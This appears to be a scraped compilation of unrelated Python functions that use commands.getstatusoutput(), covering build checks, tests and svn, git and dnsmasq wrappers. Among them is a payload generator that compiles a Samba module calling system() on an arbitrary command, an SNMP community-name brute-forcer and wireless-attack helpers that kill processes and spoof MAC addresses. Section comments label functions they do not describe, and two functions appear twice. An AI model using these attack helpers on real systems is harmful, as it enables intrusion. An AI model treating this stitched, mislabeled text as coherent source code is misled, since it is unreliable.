def execCmd(cmd,
            timeOut = -1):
    """
    Run a command through the shell and report its exit code and output.

    cmd:      Command line to execute on the shell (string).

    timeOut:  Timeout to apply while waiting for the command. The value
              -1 means that no timeout is applied (float).

    Returns:  Two-element sequence (<exit code>, <output>). Without a
              timeout this is the tuple returned by
              commands.getstatusoutput(); with a timeout it is a list
              built from the first two values of ngamsCoreExecCmd().
    """
    logger.debug("Executing command: %s", cmd)
    if timeOut != -1:
        # The third value returned by the helper (stderr) is not reported.
        exitCode, stdout, _stderr = ngamsCoreExecCmd(cmd, timeOut)
        return [exitCode, stdout]
    return commands.getstatusoutput(cmd)
# Example source code using Python's getstatusoutput()
def test_cmdline_props(self):
    """
    Launch the cmdline node and check that 'testprop' shows up exactly
    once in the device's process arguments and is queried back as 'abc'.
    """
    nodebooter, domMgr = self.launchDomainManager()
    self.assertNotEqual(domMgr, None)
    nodebooter, devMgr = self.launchDeviceManager("/nodes/cmdline_node/DeviceManager.dcd.xml")
    self.assertNotEqual(devMgr, None)

    status, output = commands.getstatusoutput('ps -ww -f | grep cmdline_dev')
    ps_lines = output.split('\n')
    # Use the first line mentioning an IOR; when none does, the last line
    # of the listing is inspected instead.
    ior_lines = [entry for entry in ps_lines if 'IOR' in entry]
    line = ior_lines[0] if ior_lines else ps_lines[-1]
    self.assertEqual(line.split(' ').count('testprop'), 1)

    props = [CF.DataType(id='testprop', value=any.to_any(None))]
    device = devMgr._get_registeredDevices()[0]
    retprops = device.query(props)
    self.assertEqual('abc', retprops[0].value._v)
def test_nocmdline_props(self):
    """
    Launch the nocmdline node and check that 'testprop' does not appear
    in the device's process arguments while still being queried as 'abc'.
    """
    nodebooter, domMgr = self.launchDomainManager()
    self.assertNotEqual(domMgr, None)
    nodebooter, devMgr = self.launchDeviceManager("/nodes/nocmdline_node/DeviceManager.dcd.xml")
    self.assertNotEqual(devMgr, None)

    status, output = commands.getstatusoutput('ps -ww -f | grep cmdline_dev')
    ps_lines = output.split('\n')
    # Use the first line mentioning an IOR; when none does, the last line
    # of the listing is inspected instead.
    ior_lines = [entry for entry in ps_lines if 'IOR' in entry]
    line = ior_lines[0] if ior_lines else ps_lines[-1]
    self.assertEqual(line.split(' ').count('testprop'), 0)

    props = [CF.DataType(id='testprop', value=any.to_any(None))]
    device = devMgr._get_registeredDevices()[0]
    retprops = device.query(props)
    self.assertEqual('abc', retprops[0].value._v)
def __init__(self, attach=True, **opts):
    """
    Locate the gdb executable and turn keyword options into gdb flags.

    attach: stored on the instance as ``_attach``.
    opts:   option names mapped to values. One-character names become
            ``-x``; names already written as ``-x...`` are kept; any other
            name not starting with ``--`` becomes ``--name`` with
            underscores replaced by dashes.

    Raises RuntimeError when ``which gdb`` exits with a non-zero status.
    """
    status, gdb = commands.getstatusoutput('which gdb')
    if status:
        raise RuntimeError('gdb cannot be found')

    pass_opts = {}
    for name, value in opts.items():
        if len(name) == 1:
            flag = '-' + name
        elif name[0] == '-' and name[1] != '-':
            flag = name
        elif name[:2] != '--':
            flag = ('--' + name).replace('_', '-')
        else:
            # NOTE(review): names that already start with '--' are not
            # forwarded at all -- confirm this is intended.
            continue
        pass_opts[flag] = value

    super(GDB, self).__init__(gdb, '=', **pass_opts)
    self._attach = attach
def run(self):
    """
    Print and execute ``self.command``, then invoke ``self.callback``
    when it is callable.

    With ``self.use_term`` set, the command is wrapped so that it runs in
    the terminal emulator named by ``def_term`` and waits on ``read``
    afterwards.
    """
    print (self.command)

    shell_line = self.command
    if self.use_term:
        shell_line = def_term + " -e 'bash -c \"" + self.command + "; read; \"'"
    commands.getstatusoutput(shell_line)

    if hasattr(self.callback, '__call__'):
        self.callback()
#
# Retarded Kill
#
def slot_monitor(self):
    """
    Toggle monitor mode on ``self.periferica`` with airmon-ng and report
    the outcome through ``self.output``; the interface list is reloaded
    afterwards.
    """
    if self.check_options(self.periferica_opt) != 0:
        if self.intf_mode == "Monitor":
            shell_cmd = 'airmon-ng stop ' + self.periferica
            success_prefix = "Monitor off: "
        else:
            shell_cmd = 'airmon-ng check kill && echo y | airmon-ng start ' + self.periferica
            success_prefix = "Monitor on: "

        status = commands.getstatusoutput(shell_cmd)
        if status[0] != 0:
            # Failure: show the command's own output.
            self.output(status[1], status[0])
        else:
            self.output(success_prefix + self.periferica, status[0])

    # NOTE(review): nesting reconstructed from flattened source; the
    # reload is assumed to run on every path -- confirm.
    self.slot_reload_interfaces()
#
# Start Client Fragmentation Attack
#
def slot_mac_change(self):
    """
    Assign ``self.change_mac_mac`` to interface ``self.change_mac_int``.

    The interface's current hardware address is first written to
    ``<config_dir>.macaddress-backup`` unless that file already exists.
    The first failing ifconfig step is reported through ``self.output``
    and ends the operation.
    """
    if self.check_options(self.change_mac_int_opt | self.change_mac_mac_opt | self.mymon_opn | self.intf_mode_opt) == 0:
        return

    # Back up the old MAC once; the result of this command is not checked.
    backup_file = config_dir + '.macaddress-backup'
    commands.getstatusoutput(
        'if [ -e ' + backup_file + ' ]; then echo ""; else ifconfig '
        + self.change_mac_int + ' | grep HWaddr | sed \'s/^.*HWaddr //\' > '
        + backup_file + '; fi')

    steps = (
        'ifconfig ' + self.change_mac_int + ' down hw ether ' + self.change_mac_mac,
        'ifconfig ' + self.change_mac_int + ' up',
    )
    for step in steps:
        status = commands.getstatusoutput(step)
        if status[0] != 0:
            self.output(status[1], status[0])
            return

    self.output('Mac address of interface ' + self.change_mac_int + ' changed in ' + self.change_mac_mac, status[0])
#
# Enable ip forwarding
#
def run(self):
    """
    Print and execute ``self.command``, then invoke ``self.callback``
    when it is callable.

    With ``self.use_term`` set, the command is wrapped so that it runs in
    the terminal emulator named by ``def_term`` and waits on ``read``
    afterwards.
    """
    print (self.command)

    shell_line = self.command
    if self.use_term:
        shell_line = def_term + " -e 'bash -c \"" + self.command + "; read; \"'"
    commands.getstatusoutput(shell_line)

    if hasattr(self.callback, '__call__'):
        self.callback()
#
# Retarded Kill
#
def slot_monitor(self):
    """
    Toggle monitor mode on ``self.periferica`` with airmon-ng and report
    the outcome through ``self.output``; the interface list is reloaded
    afterwards.
    """
    if self.check_options(self.periferica_opt) != 0:
        if self.intf_mode == "Monitor":
            shell_cmd = 'airmon-ng stop ' + self.periferica
            success_prefix = "Monitor off: "
        else:
            shell_cmd = 'airmon-ng check kill && echo y | airmon-ng start ' + self.periferica
            success_prefix = "Monitor on: "

        status = commands.getstatusoutput(shell_cmd)
        if status[0] != 0:
            # Failure: show the command's own output.
            self.output(status[1], status[0])
        else:
            self.output(success_prefix + self.periferica, status[0])

    # NOTE(review): nesting reconstructed from flattened source; the
    # reload is assumed to run on every path -- confirm.
    self.slot_reload_interfaces()
#
# Start Client Fragmentation Attack
#
def brute(ip):
    """
    Run ``snmpwalk`` against *ip* once for every entry of the module-level
    ``names`` list and print the entries that yield more than one line of
    output.

    ip: target address, inserted verbatim into the shell command line.

    Exits the process with status 1 when the shell reports that snmpwalk
    is not installed. The module-level ``verbose`` flag enables a line of
    output per attempt.
    """
    print("\n[+] Attempting BruteForce: %s" % (ip,))
    for n in names:
        output = commands.getstatusoutput('snmpwalk '+ip+" "+n)[1]
        response = StringIO.StringIO(output).readlines()

        # An empty output yields no lines at all; treat it as a plain
        # failed attempt instead of indexing into an empty list.
        first_line = response[0].lower() if response else ""
        if re.search("command not found", first_line):
            print("\n[-] snmpwalk not installed!!!\n")
            sys.exit(1)

        if verbose ==1:
            print("\t{- Trying: %s" % (n,))
        if len(response) > 1:
            print("\n\tSuccess: %s Community Name: %s" % (ip, n))
            print("\n\tTry: snmpwalk %s %s \n" % (ip, n))
    # The former ``except(), msg`` clause named an empty tuple of exception
    # types and therefore never caught anything; it has been removed.
def log(self,path,number=None):
    """
    Return the revision history of the working copy at *path*.

    path:   directory to ``cd`` into before running ``svn log -q``.
    number: maximum number of entries (passed as ``-l``); when None the
            limit is left out of the command.

    Returns a list of dicts with the keys 'ver', 'user', 'comid' (same
    value as 'ver') and 'desc' (the first two space-separated parts of
    the third column). The list is empty when the command exits with a
    non-zero status.
    """
    vList = []
    # Formatting None into the command would produce "-l None".
    limit = "" if number is None else " -l {number}".format(number=number)
    cmd = "cd {path} && svn log{limit} -q".format(path=path, limit=limit)
    status,result = commands.getstatusoutput(cmd)
    if status != 0:
        return vList

    for line in result.split('\n'):
        if line.startswith('---'):
            continue
        fields = line.split('|')
        if len(fields) < 3:
            # Blank or otherwise malformed line: nothing to extract.
            continue
        stamp = fields[2].strip().split(' ', 2)
        if len(stamp) < 2:
            continue
        revision = fields[0].strip()
        vList.append({
            'ver': revision,
            'user': fields[1].strip(),
            'comid': revision,
            'desc': stamp[0] + ' ' + stamp[1],
        })
    return vList
def autoSsWap(self):
    """
    Flip the swap autostart setting and (un)register the SwapManager
    init script accordingly; without a swap place an info box is shown.
    The swap view is refreshed at the end.
    """
    # NOTE(review): nesting reconstructed from flattened source -- confirm
    # that stop/start run whenever the init script exists and that
    # updateSwap() runs on every path.
    if not self.swap_place:
        mybox = self.session.open(MessageBox, _("You have to create a Swap File before activating autostart"), MessageBox.TYPE_INFO)
        mybox.setTitle(_("Info"))
    else:
        autostart = config.plugins.ldteam.swapautostart
        enabling = not autostart.value
        autostart.setValue(enabling)
        if fileExists('/etc/init.d/SwapManager'):
            registered = fileExists('/etc/rc3.d/S98SwapManager')
            if enabling:
                if not registered:
                    commands.getstatusoutput('update-rc.d -f SwapManager defaults 98')
                commands.getstatusoutput('sh /etc/init.d/SwapManager start')
            else:
                if registered:
                    commands.getstatusoutput('update-rc.d -f SwapManager remove')
                commands.getstatusoutput('sh /etc/init.d/SwapManager stop')
        autostart.save()
        configfile.save()
    self.updateSwap()
def __transform_xsltproc(self, file, xsl_file, output, params = None):
    """
    Apply *xsl_file* to *file* with the ``xsltproc`` command-line tool.

    file:     path of the XML input document.
    xsl_file: path of the stylesheet.
    output:   path passed to ``-o``.
    params:   optional mapping of stylesheet parameter names to values;
              each entry is passed as its own ``--stringparam`` option.

    Returns the (exit status, output text) pair reported by
    commands.getstatusoutput().
    """
    command = 'xsltproc'
    # xsltproc expects "--stringparam name value" once per parameter; a
    # single option followed by several pairs is not understood.
    for key, value in (params or {}).items():
        command += ' --stringparam %s "%s"' % (key, value)
    command += ' -o %s %s %s' % (output, xsl_file, file)
    return commands.getstatusoutput(command)
def start(self,netnsName,drive,iprange,port,mode,brName,gateway=None,dns=None):
    '''
    Start dnsmasq inside the network namespace *netnsName*.

    @param drive: 'ovs' (listen on {port}) or 'brctl' (listen on {brName}-tap)
    @param iprange: 172.16.0.100,172.16.0.254
    @param mode: int|ext ('ext' additionally advertises gateway and dns)
    @return: (status, output) of the executed command
    @raise ValueError: for an unsupported drive or mode
    '''
    interfaces = {'ovs': '{port}', 'brctl': '{brName}-tap'}
    option_tails = {
        'int': '--dhcp-option-force=3,6 --conf-file=',
        'ext': '--dhcp-option=3,{gateway} --dhcp-option=6,{dns} --conf-file= ',
    }
    # Fail with a clear message instead of hitting an unbound ``cmd`` below.
    if drive not in interfaces:
        raise ValueError("unsupported drive %r (expected 'ovs' or 'brctl')" % (drive,))
    if mode not in option_tails:
        raise ValueError("unsupported mode %r (expected 'int' or 'ext')" % (mode,))

    # The four command lines differ only in the interface name and in the
    # trailing DHCP options, so they are assembled from shared pieces.
    template = ('ip netns exec {netnsName} /usr/sbin/dnsmasq -u root -g root'
                ' --no-hosts --no-resolv --strict-order --bind-interfaces'
                ' --except-interface lo --interface ' + interfaces[drive] +
                ' --dhcp-range={iprange},infinite'
                ' --dhcp-leasefile=/var/run/dnsmasq/{port}.lease'
                ' --pid-file=/var/run/dnsmasq-{mode}.pid'
                ' --dhcp-lease-max=253 --dhcp-no-override --log-queries'
                ' --log-facility=/var/run/dnsmasq/dnsmasq-{mode}.log '
                + option_tails[mode])
    cmd = template.format(iprange=iprange,brName=brName,port=port,netnsName=netnsName,mode=mode,gateway=gateway,dns=dns)
    status,output = commands.getstatusoutput(cmd)
    return status,output
def _helper_installer(action):
    """
    Run ``bitmask_helpers install`` or ``bitmask_helpers uninstall``.

    action: either 'install' or 'uninstall'.

    Raises Exception for any other action, on platforms where IS_LINUX is
    false, and when the command exits with a non-zero status.
    """
    if action not in ('install', 'uninstall'):
        raise Exception('Wrong action: %s' % action)
    if not IS_LINUX:
        raise Exception('No install mechanism for this platform')

    cmd = 'bitmask_helpers ' + action
    if STANDALONE:
        # Standalone bundles go through the bundled "bitmask" binary.
        cmd = "%s %s" % (os.path.join(here(), "bitmask"), cmd)
    if os.getuid() != 0:
        # Not root: go through pkexec.
        cmd = 'pkexec ' + cmd

    retcode, output = commands.getstatusoutput(cmd)
    if retcode != 0:
        log.error('Error installing/uninstalling helpers: %s' % output)
        log.error('Command was: %s' % cmd)
        raise Exception('Could not install/uninstall helpers')
def need_bootstrap():
    """
    Decide whether the environment still has to be bootstrapped.

    Three things are checked: the output of running ``avocado``, the
    vt / vt-list / vt-bootstrap plugins, and a checkout directory under
    TEST_DIR for every entry of TEST_REPOS.

    :return: True if bootstrap is needed
    """
    logger.debug("Check if bootstrap required")
    required = False

    # Avocado itself: only the command's output is inspected.
    _status, output = commands.getstatusoutput('avocado')
    if 'command not ' in output:
        logger.info("Avocado needs to be installed")
        required = True

    # avocado-vt plugins
    for plugin in ['vt', 'vt-list', 'vt-bootstrap']:
        if is_avocado_plugin_avl(plugin):
            continue
        logger.info("Avocado %s plugin needs to installed", plugin)
        required = True

    # Test repositories: directory name is the repo URL's last path
    # component up to its first dot.
    for repo in TEST_REPOS:
        repo_name = repo.split('/')[-1].split('.')[0]
        if os.path.isdir(os.path.join(TEST_DIR, repo_name)):
            continue
        logger.info("Test needs to be downloaded/updated")
        required = True

    return required
def install_repo(path):
    """
    Install the repository checked out at the given path.

    Runs ``make requirements`` and ``python setup.py install`` inside the
    directory; the process exits with status 1 when the command line
    reports a non-zero status or an exception is raised while running it.

    :param path: repository path
    """
    logger.info("Installing repo: %s", path)
    repo_name = path.split('/')[-1]
    cmd = "cd %s;make requirements;python setup.py install" % path
    try:
        status, output = commands.getstatusoutput(cmd)
        logger.debug("%s", output)
        if status != 0:
            logger.error("Error while installing: %s\n%s",
                         repo_name, status)
            sys.exit(1)
    except Exception as error:
        logger.error("Failed with exception during installing %s\n%s",
                     repo_name, error)
        sys.exit(1)
def install_optional_plugin(plugin):
    """
    Install an optional avocado plugin unless it is already available.

    The plugin is expected under ``<BASE_PATH>/avocado/optional_plugins``;
    a missing directory is logged as a warning and skipped, a failing
    install is logged as an error.

    :param plugin: optional plugin name
    """
    if is_avocado_plugin_avl(plugin):
        # plugin already installed
        return

    logger.info("Installing optional plugin: %s", plugin)
    plugin_path = "%s/avocado/optional_plugins/%s" % (BASE_PATH, plugin)
    if not os.path.isdir(plugin_path):
        logger.warning("optional plugin %s is not present in path %s,"
                       " skipping install", plugin, plugin_path)
        return

    status, _output = commands.getstatusoutput(
        "cd %s;python setup.py install" % plugin_path)
    if status != 0:
        logger.error("Error installing optional plugin: %s", plugin)
def codesignapp(app_path):
    """
    Get the codesign information included in an app.

    About codesign: https://developer.apple.com/legacy/library/technotes/tn2250/_index.html#//apple_ref/doc/uid/DTS40009933

    Args:
        app_path: Mach-O path handed to ``/usr/bin/codesign -dvvv``

    Returns:
        the text printed by codesign, or '' when the command did not
        exit with status 0
    """
    result = commands.getstatusoutput("/usr/bin/codesign -dvvv %s" % app_path)
    if result and len(result) == 2 and result[0] == 0:
        return result[1]
    return ''
def create_daisy_server_image(self):
    """
    Build the Daisy Server image with daisy-img-modify.sh and move the
    resulting ``daisy/centos7.qcow2`` from the work directory to the
    configured image path, replacing a readable file already there.
    """
    LI('Begin to create Daisy Server image')
    server = self.daisy_server_info
    cmd = '{script} -c {sub_script} -a {address} -g {gateway} -s {disk_size}'.format(
        script=path_join(CREATE_QCOW2_PATH, 'daisy-img-modify.sh'),
        sub_script=path_join(CREATE_QCOW2_PATH, 'centos-img-modify.sh'),
        address=server['address'],
        gateway=server['gateway'],
        disk_size=server['disk_size'])
    LI('Command is: ')
    LI('  %s' % cmd)

    if run_shell(cmd):
        err_exit('Failed to create Daisy Server image')

    target = self.daisy_server_info['image']
    if os.access(target, os.R_OK):
        os.remove(target)
    shutil.move(path_join(self.work_dir, 'daisy/centos7.qcow2'), target)
    LI('Daisy Server image is created %s' % target)
def cmd(self, cmd, force=False, no_work=False):
    """
    Run a git command line and return ``(status, output)``.

    cmd:     command line; a leading "git " gets --work-tree/--git-dir
             options for ``self.work_tree`` inserted unless *no_work*.
    force:   run the command even when ``<work_tree>/.git`` is missing.
    no_work: leave the command line untouched.

    A non-zero status terminates the process via ``exit(status)``.
    """
    # NOTE(review): nesting reconstructed from flattened source; the echo
    # of the output and the exit check are assumed to apply to both the
    # "not a repository" and the executed case -- confirm.
    if self.work_tree and no_work == False:
        git_prefix = "git --work-tree="+self.work_tree+" --git-dir="+os.path.join(self.work_tree, ".git")+" "
        cmd = re.sub(r"^git ", git_prefix, cmd.strip())

    if self._enable_echo:
        Echo.echo("#[hello git #] "+cmd)

    if force or os.path.exists(os.path.join(self.work_tree, ".git")):
        (status, output) = commands.getstatusoutput(cmd)
    else:
        (status, output) = (1, "Not a git repository: !["+self.work_tree+"]")

    if self._enable_echo:
        # Echoing is switched off again after the first reported result.
        self._enable_echo = False
        Echo.echo("#[hello git -> " + output.replace("\n", "\nhello git -> ")+"]")

    if status != 0:
        exit(status)
    return (status, output)
def generate_payload(file_name, cmd):
    """
    Write ``<file_name>.c`` from the embedded C template and compile it
    with gcc into the shared object ``<file_name>.so``.

    file_name: base name (without extension) of the generated files.
    cmd:       text substituted verbatim into the template's ``system()``
               call.

    Returns *file_name* when gcc exits with status 0; otherwise prints a
    failure message and terminates the process via ``exit()``.
    """
    content = '''
# include <stdio.h>
# include <stdlib.h>
int samba_init_module()
{
system("%s");
return 0;
}''' % cmd
    # The context manager closes the file even when the write fails.
    with open(file_name + ".c", 'wb') as payload:
        payload.write(content.strip())

    compile_cmd = "gcc %s.c -shared -fPIC -o %s.so" % (file_name, file_name)
    (status, output) = commands.getstatusoutput(compile_cmd)
    if status == 0:
        print("[*] Generate payload succeed: %s.so" % (os.path.dirname(os.path.realpath(__file__)) + '/' + file_name))
        return file_name
    else:
        print("[!] Generate payload failed!")
        exit()
def init_dst_node(self, task_id, label):
    """
    Prepare the destination side of a task: enter (creating it if needed)
    the directory named *task_id* and create a fresh docker container.

    task_id: directory name; also stored as ``self.task_id``.
    label:   dash-separated string whose first three fields are the
             container name, the base image and the image id.

    The output of ``docker create`` is stored as ``self.container_id``.
    """
    if not os.path.isdir(task_id):
        os.mkdir(task_id)
    os.chdir(task_id)
    self.task_id = task_id

    # Parse the label info.
    label_array = label.split('-')
    container_name, base_image, image_id = (
        label_array[0], label_array[1], label_array[2])
    logging.debug('The docker image id is %s' %image_id)
    logging.debug(label_array)

    # Create the new docker container, removing a same-named one first.
    rmv_sh = 'docker rm -f ' + container_name +' >/dev/null 2>&1'
    logging.debug(rmv_sh)
    os.system(rmv_sh)

    cre_sh = 'docker create --name=' + container_name + ' ' + base_image
    logging.debug(cre_sh)
    _ret, con_id = commands.getstatusoutput(cre_sh)
    self.container_id = con_id
    #----untar the last dump directory.----#
def __init__(self):
    """
    Determine whether pkg-config exists on this machine.

    On win32 it is reported as unavailable without probing. Elsewhere the
    executable named by the PKG_CONFIG environment variable (default
    'pkg-config') is run with ``--help`` and a warning is printed when
    that fails.
    """
    if sys.platform == 'win32':
        self.has_pkgconfig = False
        return

    self.pkg_config = os.environ.get('PKG_CONFIG', 'pkg-config')
    self.set_pkgconfig_path()

    status, output = getstatusoutput(self.pkg_config + " --help")
    self.has_pkgconfig = (status == 0)
    if self.has_pkgconfig:
        return
    print("IMPORTANT WARNING:")
    print(
        " pkg-config is not installed.\n"
        " matplotlib may not be able to find some of its dependencies")
def check(self):
    """
    Check for freetype and return the resulting status message.

    On win32 only the ``ft2build.h`` header is looked up. Elsewhere the
    version printed by ``freetype-config --ftversion`` is used, falling
    back to ``self.version_from_header()`` when the command fails or its
    output contains a grep error.
    """
    if sys.platform == 'win32':
        check_include_file(get_include_dirs(), 'ft2build.h', 'freetype')
        return 'Using unknown version found on system.'

    status, output = getstatusoutput("freetype-config --ftversion")
    version = output if status == 0 else None

    # Early versions of freetype grep badly inside freetype-config,
    # so catch those cases. (tested with 2.5.3).
    if version is None or 'No such file or directory\ngrep:' in version:
        version = self.version_from_header()

    # pkg_config returns the libtool version rather than the
    # freetype version so we need to explicitly pass the version
    # to _check_for_pkg_config
    return self._check_for_pkg_config(
        'freetype2', 'ft2build.h',
        min_version='2.3', version=version)
def check(self):
    """
    Check for libpng and return the resulting status message.

    On win32 only the ``png.h`` header is looked up. Elsewhere the version
    printed by ``libpng-config --version`` (or None when that command
    fails) is handed to the pkg-config check; if that check fails but
    ``png.h`` can be found, the failure text is returned with a note
    instead of being raised.
    """
    if sys.platform == 'win32':
        check_include_file(get_include_dirs(), 'png.h', 'png')
        return 'Using unknown version found on system.'

    status, output = getstatusoutput("libpng-config --version")
    version = output if status == 0 else None

    try:
        return self._check_for_pkg_config(
            'libpng', 'png.h',
            min_version='1.2', version=version)
    except CheckFailed as e:
        if not has_include_file(get_include_dirs(), 'png.h'):
            raise
        return str(e) + ' Using unknown version found on system.'
def tearDown(self):
    """
    Run the base-class teardown, kill child processes of this process,
    restore access to the node cache directory and remove the
    ``devmgr_runtest.props`` file.
    """
    scatest.CorbaTestCase.tearDown(self)
    killChildProcesses(os.getpid())
    cleanup_cmds = (
        'chmod 755 '+os.getcwd()+'/sdr/cache/.BasicTestDevice_node',
        'rm -rf devmgr_runtest.props',
    )
    for shell_cmd in cleanup_cmds:
        commands.getstatusoutput(shell_cmd)
def test_NoWriteCache(self):
    """
    With the node cache directory made inaccessible (mode 000), launching
    the device manager must fail with return code 255.
    """
    cachedir = os.getcwd()+'/sdr/cache/.BasicTestDevice_node'
    for shell_prefix in ('mkdir -p ', 'chmod 000 '):
        commands.getstatusoutput(shell_prefix+cachedir)
    self.assertFalse(os.access(cachedir, os.R_OK|os.W_OK|os.X_OK), 'Current user can still access directory')

    devmgr_nb, devMgr = self.launchDeviceManager("/nodes/test_BasicTestDevice_node/DeviceManager.dcd.xml")
    self.assertEquals(255, devmgr_nb.returncode)
    self.assertEquals(devMgr, None)
def test_DeviceConnections(self):
    """
    Run py2prf on the reference input and check that the generated PRF
    holds exactly one simple, simplesequence, struct and structsequence
    property with the expected ids.
    """
    status,output = commands.getstatusoutput('../base/framework/python/ossie/apps/py2prf app_input/py_prf_check_base.py')
    self.assertEquals(status, 0)
    prf = parsers.PRFParser.parseString(output)
    self.assertNotEquals(prf,None)

    expected = (
        ('get_simple', 'some_simple'),
        ('get_simplesequence', 'some_sequence'),
        ('get_struct', 'some_struct'),
        ('get_structsequence', 'some_struct_seq'),
    )
    for getter_name, expected_id in expected:
        getter = getattr(prf, getter_name)
        self.assertEquals(len(getter()),1)
        self.assertEquals(getter()[0].get_id(),expected_id)
def _xmllint(self, fPath, fType):
    """
    Validate *fPath* with xmllint against the SCA V2.2.2 DTD for *fType*.

    Sets the SGML_CATALOG_FILES environment variable to the catalog under
    ``../xml/dtd``. The tool's output is printed when it exits with a
    non-zero status.

    Returns the exit status reported for the xmllint command.
    """
    os.environ['SGML_CATALOG_FILES'] = os.path.abspath("../xml/dtd/catalog.xml")
    docType = "-//JTRS//DTD SCA V2.2.2 %s//EN" % (fType.upper())
    cmd = "xmllint --nowarning --nonet --catalogs --noout --dropdtd --dtdvalidfpi '%s' %s" % (docType, fPath)
    exit_code, report = commands.getstatusoutput(cmd)
    if exit_code != 0:
        print(report)
    return exit_code